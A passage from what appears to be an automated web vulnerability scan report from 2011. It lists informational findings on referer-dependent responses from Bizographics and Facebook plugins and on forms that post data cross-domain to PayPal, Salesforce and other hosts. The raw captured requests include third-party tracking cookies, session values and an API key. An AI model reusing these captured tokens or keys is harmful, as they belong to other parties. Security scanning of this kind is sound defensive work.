Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KdarhR2PiiZ8vaj5XcunNcMDa7Re6IGD4lKHRWL2SEM8GAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyLAnMQqtYsnEVUJBxdqAyD5FQkGdGPzEhervg1jpjQxk4L0HrlcSqsipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 165
Connection: keep-alive

Demdex.parseBizo({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

Request 2

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response 2

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 15:29:20 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 21
Connection: keep-alive

Unknown Referer: null

15.4. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Request 1

GET /plugins/activity.php?api_key=63203377906&font=arial&height=300&locale=en_US&recommendations=false&sdk=joey&site=http%3A%2F%2Fwww.ehow.com%2F&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dconstantcontact.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.constantcontact.com%252Findex.jsp%26extra_2%3DUS; lsd=ErPUD; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; datr=8CJHTYhjyotVYfKpZ5B35lnF; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 15:29:07 GMT
Content-Length: 7782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u054761_1" class="fbConnectWidgetTopmost " style="height:298px; width:298px; font-family:"arial", sans-serif;"><div class="phm fbConnectWidgetHeaderTitle uiBoxLightblue"><div class="clearfix"><div class="lfloat"><div class="fbWidgetTitle fsl fwb fcb">Recent Activity</div></div><div class="rfloat"></div></div></div><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="ehow.com" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_1" value="http://www.ehow.com/" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u054761_3"><input value="Sign Up" type="submit" id="u054761_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u054761_1").login();"><b>log in</b></a> to see what your friends are doing.<img class="fbSocialWidgetTrackingPixel img" src="/campaign/impression.php?campaign_id=137675572948107&partner_id=ehow.com&placement=activity&extra_1=http%3A%2F%2Fwww.ehow.com%2F&extra_2=US" /></div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u054761_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"></div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div></div><div class="fbConnectWidgetFooter"><div class="fbFooterBorder"><div class="UIImageBlock clearfix"><a class="UIIma
...[SNIP]...

Request 2

GET /plugins/activity.php?api_key=63203377906&font=arial&height=300&locale=en_US&recommendations=false&sdk=joey&site=http%3A%2F%2Fwww.ehow.com%2F&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dconstantcontact.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.constantcontact.com%252Findex.jsp%26extra_2%3DUS; lsd=ErPUD; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; datr=8CJHTYhjyotVYfKpZ5B35lnF; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 15:30:49 GMT
Content-Length: 7657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u064903_1" class="fbConnectWidgetTopmost " style="height:298px; width:298px; font-family:"arial", sans-serif;"><div class="phm fbConnectWidgetHeaderTitle uiBoxLightblue"><div class="clearfix"><div class="lfloat"><div class="fbWidgetTitle fsl fwb fcb">Recent Activity</div></div><div class="rfloat"></div></div></div><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u064903_3"><input value="Sign Up" type="submit" id="u064903_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u064903_1").login();"><b>log in</b></a> to see what your friends are doing.<img class="fbSocialWidgetTrackingPixel img" src="/campaign/impression.php?campaign_id=137675572948107&partner_id&placement=activity&extra_2=US" /></div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u064903_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"></div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div></div><div class="fbConnectWidgetFooter"><div class="fbFooterBorder"><div class="UIImageBlock clearfix"><a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1">
...[SNIP]...

15.5. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fdevelopers.facebook.com%2Fblog%2Fpost%2F377&force_resize=1&show_faces=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/blog/post/377
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsd=ErPUD; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; datr=8CJHTYhjyotVYfKpZ5B35lnF; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 20:17:55 GMT
Content-Length: 9394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d49bbf38a8500e16352086" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>The Next Evolution of Facebook Platform</b>.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_share_comment_span hidden_elem"> · <a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 1,268 others like this.</span><span class="connect_widget_not_connected_text">1268 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&partner_id=developers.facebook.com&placement=like_button&extra_1=http%3A%2F%2Fdevelopers.facebook.com%2Fblog%2Fpost%2F377&extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_share_comment_span hidden_elem"> · <a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_w
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fdevelopers.facebook.com%2Fblog%2Fpost%2F377&force_resize=1&show_faces=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsd=ErPUD; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; datr=8CJHTYhjyotVYfKpZ5B35lnF; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 20:19:08 GMT
Content-Length: 9254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d49bc3ca027d6b70606162" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>The Next Evolution of Facebook Platform</b>.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_share_comment_span hidden_elem"> · <a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 1,268 others like this.</span><span class="connect_widget_not_connected_text">1268 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&partner_id&placement=like_button&extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_share_comment_span hidden_elem"> · <a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admi
...[SNIP]...

16. Cross-domain POST previous next
There are 17 instances of this issue:

http://dillerdesign.com/experiment/DD_belatedPNG/
http://erncpa.com/
http://erncpa.com/
http://gsgd.co.uk/sandbox/jquery/easing/
http://leandrovieira.com/projects/jquery/lightbox/
http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx
https://my.omniture.com/support_popup_form.html
http://trw.mediaroom.com/index.php
http://www.dillerdesign.com/experiment/DD_belatedPNG/
http://www.huddletogether.com/projects/lightbox2/
http://www.milleniumdental.net/
http://www.neaq.org/index.php
http://www.techmynd.com/cross-site-scripting-attacks-xss/
http://www.thefreedomtrail.org/
http://www.theroot.com/multimedia/50-years-black-history
http://www.theroot.com/views/2011/young-futurists
http://www.theroot.com/views/meet-25-people-who-will-change-our-world

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

16.1. http://dillerdesign.com/experiment/DD_belatedPNG/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dillerdesign.com
Path:	/experiment/DD_belatedPNG/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
encrypted
submit

Request

GET /experiment/DD_belatedPNG/ HTTP/1.1
Host: dillerdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.16
Connection: close
Content-Type: text/html
Content-Length: 30282

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
               <!--
           DD_belatedPNG is free software under the MIT License: http://dillerdes
...[SNIP]...
</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

16.2. http://erncpa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://erncpa.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain portal.secure256.com. The form contains the following fields:

Username
Password
Submit

Request

GET / HTTP/1.1
Host: erncpa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.3. http://erncpa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://erncpa.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.cpaemailmarketing.com. The form contains the following fields:

function
un
custom5
email
submit

Request

GET / HTTP/1.1
Host: erncpa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.4. http://gsgd.co.uk/sandbox/jquery/easing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gsgd.co.uk
Path:	/sandbox/jquery/easing/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
buyer_credit_promo_code
buyer_credit_product_category
buyer_credit_shipping_method
buyer_credit_user_address_change
no_shipping
return
cancel_return
cn
currency_code
tax
lc
bn
submit

Request

GET /sandbox/jquery/easing/ HTTP/1.1
Host: gsgd.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.5. http://leandrovieira.com/projects/jquery/lightbox/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leandrovieira.com
Path:	/projects/jquery/lightbox/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

GET /projects/jquery/lightbox/ HTTP/1.1
Host: leandrovieira.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:20 GMT
Server: Apache
Last-Modified: Wed, 28 Jul 2010 01:05:18 GMT
ETag: "3cac22e-4440-48c68360aaf80"
Accept-Ranges: bytes
Content-Length: 17472
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="tex
...[SNIP]...
</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick" />
...[SNIP]...

16.6. http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-life/new-year-new-you/article.aspx

Issue detail

The page contains a form which POSTs data to the domain subscribe.hearstmags.com. The form contains the following fields:

offer_id
source_code
parent_trans_id
offer_term
country_code
pt_id
general_optin
first_name
last_name
address
address2
city
state
postal_code
email
submit

Request

GET /your-life/new-year-new-you/article.aspx?cp-documentid=25037350&gt1=32060 HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.7. https://my.omniture.com/support_popup_form.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/support_popup_form.html

Issue detail

The page contains a form which POSTs data to the domain ssl.salesforce.com. The form contains the following fields:

orgid
retURL
00N00000004YW16
00N00000004YVzY
name
phone
email
type
type
type
type
type
subject
submit

Request

GET /support_popup_form.html HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:31:52 GMT
Server: Omniture AWS/2.0.0
xserver: www440
Content-Type: text/html
Connection: close
Content-Length: 24454

<html>
<head>
   <title>OMNITURE - Contact Support</title>
   <LINK href="httpss://my.omniture.com/includes/styles.css" type="text/css" rel="stylesheet">
       <META HTTP-EQUIV="Content-type" CONTENT="text/ht
...[SNIP]...
<span class="bodyblack">
<form name="form" action="http://ssl.salesforce.com/servlet/servlet.WebToCase" method=post onSubmit="return validateForm(this)">

<input type=hidden name="orgid" value="00D00000000hgFu">
...[SNIP]...

16.8. http://trw.mediaroom.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trw.mediaroom.com
Path:	/index.php

Issue detail

The page contains a form which POSTs data to the domain www.trw.com. The form contains the following fields:

search_block_form
form_build_id
form_id
op

Request

GET /index.php HTTP/1.1
Host: trw.mediaroom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.9. http://www.dillerdesign.com/experiment/DD_belatedPNG/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dillerdesign.com
Path:	/experiment/DD_belatedPNG/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
encrypted
submit

Request

GET /experiment/DD_belatedPNG/ HTTP/1.1
Host: www.dillerdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:44:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.16
Connection: close
Content-Type: text/html
Content-Length: 30282

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
               <!--
           DD_belatedPNG is free software under the MIT License: http://dillerdes
...[SNIP]...
</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

16.10. http://www.huddletogether.com/projects/lightbox2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huddletogether.com
Path:	/projects/lightbox2/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
no_note
currency_code
tax
bn
submit

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:30:24 GMT
Server: Apache
Last-Modified: Wed, 10 Mar 2010 20:38:11 GMT
ETag: "a0be022-3006-4817846d0f2c0"
Accept-Ranges: bytes
Content-Length: 12294
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>

   <title>Lightbox 2<
...[SNIP]...
</p>
   <form action="https://www.paypal.com/cgi-bin/webscr" method="post">
       <fieldset>
...[SNIP]...

16.11. http://www.milleniumdental.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.milleniumdental.net
Path:	/

Issue detail

The page contains a form which POSTs data to the domain expressclient.dreamingcode.com. The form contains the following fields:

dc_key
dc_subkey
dc_fields_key
dc_types_key
dc_exclude_key
FirstName
LastName
CompanyName
Phone
EmailAddress
DescriptionInfo
contact_submit

Request

GET / HTTP/1.1
Host: www.milleniumdental.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:58:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6s4sdr3asl7l8jjkbs45cohrb7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head><tit
...[SNIP]...
</span><form action="http://expressclient.dreamingcode.com/process.php" method="POST">
<input type="hidden" name="dc_key" id="dc_key" value="c3BfbmFtZXx8cmVkaXJlY3R8fFBsdWdpbklEfHxDbGllbnRJbmR1c3RyeUlEfHxUb0VtYWlsQWRkcmVzc3x8Q0NFbWFpbEFkZHJlc3N8fEJDQ0VtYWlsQWRkcmVzc3x8T3duZWRCeVN5c3Rl
...[SNIP]...

16.12. http://www.neaq.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neaq.org
Path:	/index.php

Issue detail

The page contains a form which POSTs data to the domain secure2.convio.net. The form contains the following fields:

api_key
v
method
add_group_ids
add_interest_ids
success_redirect
error_redirect
primary_email
Submit

Request

GET /index.php HTTP/1.1
Host: www.neaq.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:04:17 GMT
